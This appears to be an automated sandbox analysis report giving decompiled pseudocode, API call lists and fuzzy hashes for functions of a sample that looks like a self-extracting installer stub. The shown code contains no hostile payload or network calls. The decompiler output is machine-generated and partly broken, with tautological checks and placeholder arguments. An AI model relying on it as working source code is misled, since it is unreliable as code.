                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CF9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(010D9154,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2E0A
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                                                                                                                                            • API String ID: 1002816675-2113404272
                                                                                                                                                                                                                                            • Opcode ID: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
                                                                                                                                                                                                                                            • Instruction ID: 580bad3d8bc054534bbc3f33c2a6629aad03abbd9d0bfe74aca4934ca9a73c1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A512B70341302ABF770A679DD4AB7B3AD8EB55704F008469FEC1D61C9DBB98841C725
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E010D4224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E010D44B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x10d88c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x10d87a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x10d8598;
		_v36 = 1;
		_v32 = E010D4200;
		_v28 = 0x10d88c0;
		 *0x10da288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x10da288(_t32, 0x10d88c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x10d88c0 != 0) {
				E010D1680(0x10d87a0, 0x104, 0x10d88c0);
			}
			 *0x10da288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x10d87a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x10d88c0);
		_t61 = 0x10d88c0;
		_t4 =  &(_t61[1]); // 0x10d88c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x10d88c0; // 0x21b1181
		_t44 = CharPrevA(0x10d88c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x10d88c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}




























                                                                                                                                                                                                                                            0x010d42ad
                                                                                                                                                                                                                                            0x010d42ad
                                                                                                                                                                                                                                            0x010d42af
                                                                                                                                                                                                                                            0x010d42b0
                                                                                                                                                                                                                                            0x010d42b6
                                                                                                                                                                                                                                            0x010d42c2
                                                                                                                                                                                                                                            0x010d42c8
                                                                                                                                                                                                                                            0x010d42ce
                                                                                                                                                                                                                                            0x010d42e4
                                                                                                                                                                                                                                            0x010d42e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d42ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010D4236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010D424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010D4263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010D427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,010D88C0,?,00000001), ref: 010D429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D88C0,021B1181,?,00000001), ref: 010D42C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D88C0,00000000,?,00000001), ref: 010D42D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D4391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D43A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
                                                                                                                                                                                                                                            • Instruction ID: 248a21b21e9344f94b954a62521cb2cc0a0476c9b1b64f9f70d58a362f4d2f6d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B241E974A01354EFE721AF79E8859BE7FB4EB45344F0481AAEDC1E7245CB798901CB60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E010D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				char _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				char* _t59;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E010D43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, 0x10d9154);
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					if( *0x10d9a40 == _t42) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						if(GetDlgItemTextA(_t64, 0x835, 0x10d91e4, 0x104) == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E010D44B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t4 =  &(_t49[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t59 = _t4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						if(_t49 - _t59 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0x10d91e5;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a ||  *0x10d91e4 == 0x5c && _t24 == 0x5c) {
                                                                                                                                                                                                                                            							if(GetFileAttributesA(0x10d91e4) != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E010D658A(0x10d91e4, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            								if(E010D58C8(0x10d91e4) != 0) {
                                                                                                                                                                                                                                            									if( *0x10d91e4 != 0x5c ||  *0x10d91e5 != 0x5c) {
                                                                                                                                                                                                                                            										if(E010D597D(0x10d91e4, 1, _t64, 1) == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(E010D44B9(_t64, 0x54a, 0x10d91e4, 0, 0x20, 4) != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(CreateDirectoryA(0x10d91e4, 0) != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10d91e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(LoadStringA( *0x10d9a3c, 0x3e8, 0x10d8598, 0x200) != 0) {
                                                                                                                                                                                                                                            						if(E010D4224(_t64, _t46, _t46) == 0 || SetDlgItemTextA(_t64, 0x835, 0x10d87a0) != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t63 = 0x4c0;
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							E010D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							goto L38;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3366
                                                                                                                                                                                                                                            0x010d3367
                                                                                                                                                                                                                                            0x010d3369
                                                                                                                                                                                                                                            0x010d336a
                                                                                                                                                                                                                                            0x010d336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d331a
                                                                                                                                                                                                                                            0x010d324c
                                                                                                                                                                                                                                            0x010d324f
                                                                                                                                                                                                                                            0x010d32c8
                                                                                                                                                                                                                                            0x010d32ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d32ce
                                                                                                                                                                                                                                            0x010d3256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3279
                                                                                                                                                                                                                                            0x010d329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d32be
                                                                                                                                                                                                                                            0x010d32be
                                                                                                                                                                                                                                            0x010d3280
                                                                                                                                                                                                                                            0x010d3289
                                                                                                                                                                                                                                            0x010d328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d328e
                                                                                                                                                                                                                                            0x010d329f
                                                                                                                                                                                                                                            0x010d327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,010D8598,00000200), ref: 010D3271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D33E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D33F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010D3410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 010D3426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 010D342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D343F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2418873061-0
                                                                                                                                                                                                                                            • Opcode ID: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
                                                                                                                                                                                                                                            • Instruction ID: 5e6686feb51dd231202e50faf35146d2fa475f071fb5aaf76a044f0955abef9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 595107B4382351B6EB725A799C4CFBF2D99FB46B54F008028FAC59E1C5CEAD9401C362
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E010D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x10d91d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x10d8584 = _t35;
                                                                                                                                                                                                                                            					E010D43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x10d8184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, 0x10d9154);
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E010D4FE0, 0, 0, 0x10d8798);
                                                                                                                                                                                                                                            					 *0x10d879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E010D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x10d858c);
                                                                                                                                                                                                                                            					_t38 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E010D44B9(_t38, 0x4b2, 0x10d1140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x10d91d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x10d858c);
                                                                                                                                                                                                                                            						_t39 =  *0x10d879c; // 0x0
                                                                                                                                                                                                                                            						E010D3680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x10d858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x10d879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 010D3535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D3541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 010D355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(010D1140,00000000,00000020,00000004), ref: 010D3590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D35C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 010D35F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 010D35F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 010D3610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 010D3617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D3623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 010D3637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D3671
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2406144884-0
                                                                                                                                                                                                                                            • Opcode ID: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
                                                                                                                                                                                                                                            • Instruction ID: 136d5c9b1050aef816db2b6264793d6e65d5da7bbf0b208419ae267604c8ca81
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b2a6d753750479d1c0aeecbf8926018f4b0d9738d5303bade9951613f59816d
